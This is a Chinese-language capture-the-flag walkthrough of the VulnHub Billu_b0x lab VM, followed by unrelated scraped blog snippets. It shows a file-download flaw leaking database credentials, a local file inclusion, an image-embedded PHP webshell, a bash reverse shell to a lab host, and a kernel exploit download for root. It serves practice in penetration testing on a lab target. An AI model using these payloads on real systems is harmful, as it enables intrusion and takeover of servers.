知识点

SQLi、目录爆破、数据库操作、文件包含漏洞、提权、反弹shell

解题步骤

nmap扫描有80,22端口

nmap -sV -Pn -T 4 192.168.220.132

访问网页提示sqli,使用万能注入admin' or 'a'='a --,返回js弹窗,可能无法注入

御剑扫描目录有test.phpindex.phpc.phpshow.phpin.php

尝试下载文件

发现调用函数file_download($_POST['file']);下载文件,即在test.php页面通过传入file的文件名,可以下载对应的文件。

将其他php文件下载下来,发现c.php文件中包含了mysql的账户密码

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

访问192.168.220.132/phpmyadmin输入账户密码,成功进入

在ica表的auth列中找到后台登录账户和密码

登录index.php,进入http://192.168.220.132/panel.php,发现有show User和Add User,分别对应数据库user表和add.php的样式

添加用户,可以正常上传

右键图片有图片地址,进入查看

在panel.php源码中查看到可能存在本地文件包含漏洞

	if($choice==='add')

	{

       		include($dir.'/'.$choice.'.php');

			die();

	}

        if($choice==='show')

	{

		include($dir.'/'.$choice.'.php');

		die();

	}

	else

	{

		include($dir.'/'.$_POST['load']);

	}

在一个图片后面上传cmd马<?php system($_GET['cmd']); ?>并上传

在panel.php点击continue,修改load位置为上传的图片load=/uploaded_images/1.jpg&continue=continue

成功得到回显

POST /panel.php?cmd=cat%20/etc/passwd;ls查看用户

利用bash反弹shell

echo "bash -i >& /dev/tcp/192.168.220.154/4444 0>&1" | bash

需要转为url

burp发送

监听成功

┌──(root㉿kali)-[/home/kali/桌面]

└─# nc -nvlp 4444

listening on [any] 4444 ...

connect to [192.168.220.154] from (UNKNOWN) [192.168.220.132] 58490

bash: no job control in this shell

www-data@indishell:/var/www$

查看系统内核版本,为ubuntu12.04

cat /etc/issue

本地提权漏洞

https://www.exploit-db.com/exploits/37292/

由于菜刀连接失败,使用python开启http服务

python -m http.server 80

在靶机上请求下载

www-data@indishell:/var/www/uploaded_images$ wget http://192.168.220.154/37292.c

</uploaded_images$ wget http://192.168.220.154/37292.c

--2022-04-21 10:50:23--  http://192.168.220.154/37292.c

Connecting to 192.168.220.154:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 5119 (5.0K) [text/x-csrc]

Saving to: `37292.c'

     0K ....                                                  100% 3.50M=0.001s

2022-04-21 10:50:23 (3.50 MB/s) - `37292.c' saved [5119/5119]

下载完成后赋权编译运行

chmod 777 37292.c

gcc 37292.c -o exp

./exp

提权完毕

# id

uid=0(root) gid=0(root) groups=0(root),33(www-data)

vulnhub billu:b0x的更多相关文章

  1. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  2. Billu_b0x内网渗透-vulnhub

    个人博客:点我 本次来试玩一下vulnhub上的Billu_b0x,只有一个flag,下载地址. 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题.靶场 ...

  3. vulnhub writeup - 持续更新

    目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...

  4. Vulnhub Billu_b0x

    1.信息收集 1.1.获取IP地址: map scan report for 192.168.118.137 Host is up (0.00017s latency). Not shown: 998 ...

  5. Vulnhub Breach1.0

    1.靶机信息 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/C ...

  6. Vulnhub靶场渗透练习(二) Billu_b0x

    运行虚拟机直接上nmap扫描 获取靶场ip nmap 192.168.18.* 开放端口 TCP 22 SSH OpenSSH 5.9p1 TCP 80 HTTP Apache httpd 2.2.2 ...

  7. HA Joker Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...

  8. HA: ISRO Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Startin ...

  9. LAMPSecurity: CTF6 Vulnhub Walkthrough

    镜像下载地址: https://www.vulnhub.com/entry/lampsecurity-ctf6,85/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202 ...

  10. Hacker Fest: 2019 Vulnhub Walkthrough

    靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: py ...

随机推荐

  1. vue项目webpack打包

    之前一篇随笔写到vue多环境打包环境配置:https://www.cnblogs.com/shun1015/p/13411636.html 1.区分vue脚手架版本,版本不同,项目结构不同,多环境变量 ...

  2. 【必知必会的MySQL知识】④DCL语言

    目录 一.概述 二 .授权 2.1 语法格式 2.2 语法说明 2.3 权限类型 2.4 权限级别 三. 回收权限 3.1 语法格式 3.2 语法说明 3.3 注意事项 四 .实践操作 一.概述 数据 ...

  3. 音视频八股文(2)--ffmpeg常见命令(1)

    官方文档: https://www.ffmpeg.org/ffplay-all.html https://www.ffmpeg.org/ffmpeg-all.html 01-Windows FFMPE ...

  4. 2021-03-23:给定一个正整数组成的无序数组arr,给定一个正整数值K,找到arr的所有子数组里,哪个子数组的累加和等于K并且是长度最大的。返回其长度。

    2021-03-23:给定一个正整数组成的无序数组arr,给定一个正整数值K,找到arr的所有子数组里,哪个子数组的累加和等于K并且是长度最大的.返回其长度. 福大大 答案2021-03-23: 双指 ...

  5. 2021-12-16:给定两个数a和b, 第1轮,把1选择给a或者b, 第2轮,把2选择给a或者b, ... 第i轮,把i选择给a或者b。 想让a和b的值一样大,请问至少需要多少轮? 来自字节跳动。

    2021-12-16:给定两个数a和b, 第1轮,把1选择给a或者b, 第2轮,把2选择给a或者b, - 第i轮,把i选择给a或者b. 想让a和b的值一样大,请问至少需要多少轮? 来自字节跳动. 答案 ...

  6. 2021-09-27:Pow(x, n)。实现 pow(x, n) ,即计算 x 的 n 次幂函数(即,x**n)。力扣50。

    2021-09-27:Pow(x, n).实现 pow(x, n) ,即计算 x 的 n 次幂函数(即,x**n).力扣50. 福大大 答案2021-09-27: 遍历n的二进制位. 时间复杂度:O( ...

  7. 【GiraKoo】安装Visual Assist失败,提示“此扩展已经安装到所有适用的产品”

    [问题解决]安装Visual Assist失败,提示"此扩展已经安装到所有适用的产品" 在安装Visual Assist插件时,提示错误. 点击下一步之后,进入插件安装界面.插件安 ...

  8. ET介绍——组件式设计(优化版的ECS)

    组件式设计 在代码复用和组织数据方面,面向对象可能是大家第一反应.面向对象三大特性继承,封装,多态,在一定程度上能解决不少代码复用,数据复用的问题.不过面向对象不是万能的,它也有极大的缺陷: 1. 数 ...

  9. HTML5网页游戏开发

    HTML概述 互联网上的应用程序被称为Web应用程序,web应用程序使用Web文档(网页)来表示用户界面,Web文档都遵循html格式,html5是最新的html标准 HTML基础 HTML是Hype ...

  10. flutter 填坑之旅(dart学习笔记篇)

    俗话说 '工欲善其事必先利其器' 想要撸flutter app 而不懂 dart 那就像一个不会英语的人在和英国人交流,懵! 安装 dart 就不用说了,比较简单dart 官网 https://dar ...